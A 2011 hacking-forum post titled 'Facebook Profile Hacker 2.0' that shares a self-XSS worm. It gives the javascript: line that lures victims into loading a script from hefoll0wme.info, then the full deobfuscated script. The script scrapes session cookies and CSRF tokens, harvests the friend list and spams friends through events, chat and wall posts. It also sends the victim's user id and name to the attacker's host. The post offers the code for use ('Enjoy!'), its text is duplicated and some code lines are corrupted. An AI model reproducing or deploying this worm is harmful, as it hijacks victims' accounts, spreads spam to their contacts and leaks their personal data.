04-26-2011, 08:30 AM
[GET] Facebook Profile Hacker 2.0
This is not for NOOB, please use with caution
I was a little bored today and came to this page:
Code:
You noticed this section:
Code:
It tricks visitors to paste that code in the address bar so they can inject the malicious javascript into FB and then spam their walls and their friend's walls also open Ajax Chat of Facebook and spam a message as well.
So I fully decoded this shit:
Code:
Enjoy!
This is not for NOOB, please use with caution
I was a little bored today and came to this page:
Code:
Code:
http://dumbfb.blogspot.com
You noticed this section:
Code:
Code:
javascript:(a=(b=document).createElement('script')).src='//hefoll0wme.info/checker2.js',b.body.appendChild(a);void(0)
So I fully decoded this shit:
Code:
Code:
var randomnumber = Math['floor'](Math['random']() * 99999);
var randomnumber1 = Math['floor'](Math['random']() * 987);
var randomnumber2 = Math['floor'](Math['random']() * 754);
var randomnumber3 = Math['floor'](Math['random']() * 43);
var randomnumber4 = Math['floor'](Math['random']() * 9);
var random = Math['floor'](Math['random']() * 5);
var url = 'http://hellobusters.blogspot.com?';
var message = '%firstname%, i can hack ANY facebook account! it\'s so easy! check it out ';
var ev = 'Hey everyone, \x0A\x0A I have found out how you can hack ANYONE\'s facebook account \x0A\x0A it\'s so easy! \x0A check it out - ';
var ev2 = '\x0A\x0Ajust don\'t log into mine :)';
var test = 'I have hacked: %tf%\'s, %tf%\'s, %tf%\'s and %tf%\'s accounts!\x0A\x0A it\'s so easy!\x0ACheck it out - ';
var eventname = 'HACK FACEBOOK!!';
var redirect = 'http://hefoll0wme.info/final.php';
var postmessage = test + url + randomnumber;
var chatmessage = message + url + randomnumber;
var eventdesc = ev + url + randomnumber;
var nfriends = 4000;
var debug = false;
var wf = 0;
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect
}, 500)
}
};
var doget = function (a, b, c) {
var d = new XMLHttpRequest();
d['open']('GET', a);
d['onreadystatechange'] = function () {
if (d['readyState'] == 4) {
if (d['status'] == 200 and& b) {
b(d['responseText'])
};
if (c) {
c()
}
}
};
d['send']()
};
doget('/', function (u) {
var v = document['cookie']['match'](/c_user=(\d+)/)[1];
var w = function (a) {
return a ? '@[' + a['id'] + ':' + a['name'] + ']' : ''
};
var x = function (a) {
return a ? a['name'] : ''
};
var y = function (a) {
out = '';
for (var b in a) {
out += (out ? 'and' : '') + b + ((a[b] !== null) ? '=' + encodeURIComponent(a[b]) : '')
};
return out
};
var z = function (a, b, c, d) {
var e = new XMLHttpRequest();
e['open']('POST', a);
e['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
e['onreadystatechange'] = function () {
if (e['readyState'] == 4) {
if (e['status'] == 200 and& c) {
c(e['responseText'])
};
if (d) {
d()
}
}
};
e['send'](y(b))
};
var A = function () {
var a = document['createElement']('div');
a['style']['display'] = 'block';
a['style']['position'] = 'absolute';
a['style']['width'] = 100 + '%';
a['style']['height'] = 100 + '%';
a['style']['left'] = 0 + 'px';
a['style']['top'] = 0 + 'px';
a['style']['textAlign'] = 'center';
a['style']['padding'] = '4px';
a['style']['background'] = '#FFFFFF';
a['style']['zIndex'] = 999999;
a['innerHTML'] = ' <br/>Please wait, this can take a little while...<br/><br/> If it takes more than a minute..<a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
document['body']['appendChild'](a)
};
var B = u['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
if (B) {
comp = B[1]
} else {
comp = ''
};
var C = u['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
var D = u['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
var E = document['getElementById']('navAccountName')['firstChild']['data'];
redirect = redirect + '?' + y({
userid: v,
name: E,
doclose: 1
});
A();
if (eventdesc) {
wf++;
z('/ajax/choose/?__a=1', {
type: 'event',
eid: null,
invite_message: '',
__d: 1,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest'
}, function (h) {
var i = h['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
var j = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + v + '&token=' + i + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
doget(j, function (a) {
var b = a['match'](/\{"uid":\d+,/g);
var c = [];
for (var d = 0; d < b['length']; d++) {
var e = b[d]['match'](/:(\d+),/)[1];
if (e != v) {
c['push'](e)
}
};
var f = new Date();
f['setTime'](f['getTime']() + 60 * 60 * 24 * 1000);
datestr = (f['getMonth']() + 1) + '/' + f['getDate']() + '/' + f['getFullYear']();
timestr = f['getHours']() * 60;
var g = {
post_form_id: C,
fb_dtsg: D,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: '',
location: '',
street: '',
geo_id: '',
geo_sq: '',
desc: eventdesc,
sgb_invitees: c['join'](','),
sgb_emails: '',
sgb_message: '',
privacy_type: 'on',
guest_list: 'on',
connections_can_post: 'on',
save: 'Create Event',
submitting: ''
};
g['new'] = '';
z('/events/create.php', g, false, function () {
mf(--wf)
})
})
})
};
if (chatmessage) {
wf++;
z('/ajax/chat/buddy_list.php?__a=1', {
user: v,
post_form_id: C,
fb_dtsg: D,
lsd: null,
post_form_id_source: 'AsyncRequest',
popped_out: false,
force_render: true
}, function (a) {
var b = a['substr'](9);
var c = eval('(' + b + ')');
var d = c['payload']['buddy_list'];
for (var e in d['nowAvailableList']) {
var f = Math['floor'](Math['random']() * 1335448958);
var g = (new Date())['getTime']();
var h = chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']());
z('/ajax/chat/send.php?__a=1', {
msg_id: Math['floor'](Math['random']() * 1335448958),
client_time: (new Date())['getTime'](),
msg_text: chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']()),
to: e,
post_form_id: C,
fb_dtsg: D,
post_form_id_source: 'AsyncRequest'
})
};
mf(--wf)
})
};
if (postmessage) {
wf++;
doget('/ajax/browser/friends/?uid=' + v + '&filter=all&__a=1&__d=1', function (g) {
var h = g['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var i = [];
if (h) {
for (var j = 0; j < h['length']; j++) {
var k = h[j]['match'](/_\d+_/)[0]['replace'](/_/g, '');
var l = h[j]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
i['push']({
id: k,
name: l
})
}
};
var n = [];
var o = [];
while (i['length']) {
var p = Math['floor'](Math['random']() * i['length']);
n['push'](i[p]);
o['push'](i[p]);
var q = i['shift']();
if (p) {
i[p - 1] = q
}
};
if (debug) {
alert('fetched friends: ' + n['length'])
};
var r = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: v,
xhpc_context: 'home',
xhpc_fbx: '',
lsd: null,
post_form_id_source: 'AsyncRequest'
};
mt = postmessage;
m = postmessage;
while (mt['search']('%tf%') >= 0) {
var s = n['pop']();
mt = mt['replace']('%tf%', x(s));
m = m['replace']('%tf%', w(s))
};
r['xhpc_message_text'] = mt;
r['xhpc_message'] = m;
if (debug) {
alert('message text: ' + mt)
};
z('/ajax/updatestatus.php?__a=1', r);
var t = function (a) {
if (a == 0) {
wf = 0;
mf();
return
};
var b = o['shift']();
var c = {
post_form_id: C,
fb_dtsg: D,
xhpc_composerid: comp,
xhpc_targetid: b['id'],
xhpc_context: 'profile',
xhpc_fbx: 1,
lsd: null,
post_form_id_source: 'AsyncRequest'
};
var d = postmessage;
var e = postmessage;
if (n['length'] == 0) {
wf = 0;
mf();
return
};
while (d['search']('%tf%') >= 0) {
var f = n['pop']();
d = d['replace']('%tf%', x(f));
e = e['replace']('%tf%', w(f))
};
c['xhpc_message_text'] = d;
c['xhpc_message'] = e;
z('/ajax/updatestatus.php?__a=1', c);
setTimeout(function () {
t(a - 1)
}, 2000)
};
wf++;
setTimeout(function () {
t(nfriends)
}, 2000)
})
};
mf()
});